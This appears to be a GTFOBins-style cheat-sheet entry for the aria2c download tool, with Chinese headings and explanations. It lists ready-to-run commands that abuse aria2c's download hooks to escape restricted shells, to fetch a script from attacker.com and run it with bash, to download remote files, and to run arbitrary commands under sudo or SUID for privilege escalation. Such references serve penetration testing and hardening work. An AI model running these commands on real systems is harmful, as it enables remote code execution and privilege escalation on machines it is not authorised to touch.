.. / aria2c

command

运行非交互式系统命令来摆脱受限环境。

• COMMAND='id'
  TF=$(mktemp)
  echo "$COMMAND" > $TF
  chmod +x $TF
  aria2c --on-download-error=$TF http://x
  

  The remote file aaaaaaaaaaaaaaaa (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. --allow-overwrite is needed if this is executed multiple times with the same GID.

  aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa

file-download

下载远程文件。

• Fetch a remote file via HTTP GET request. Use --allow-overwrite if needed.

  URL=http://attacker.com/file_to_get
  LFILE=file_to_save
  aria2c -o "$LFILE" "$URL"
  

sudo

如果二进制文件被 sudo 允许以超级用户身份运行，可能被用于访问文件系统、提升或维持特权访问。

• COMMAND='id'
  TF=$(mktemp)
  echo "$COMMAND" > $TF
  chmod +x $TF
  sudo aria2c --on-download-error=$TF http://x
  

limited-suid

suid是一种授予文件的权限类型，它允许用户使用者以文件所有者的权限来执行文件。

• COMMAND='id'
  TF=$(mktemp)
  echo "$COMMAND" > $TF
  chmod +x $TF
  ./aria2c --on-download-error=$TF http://x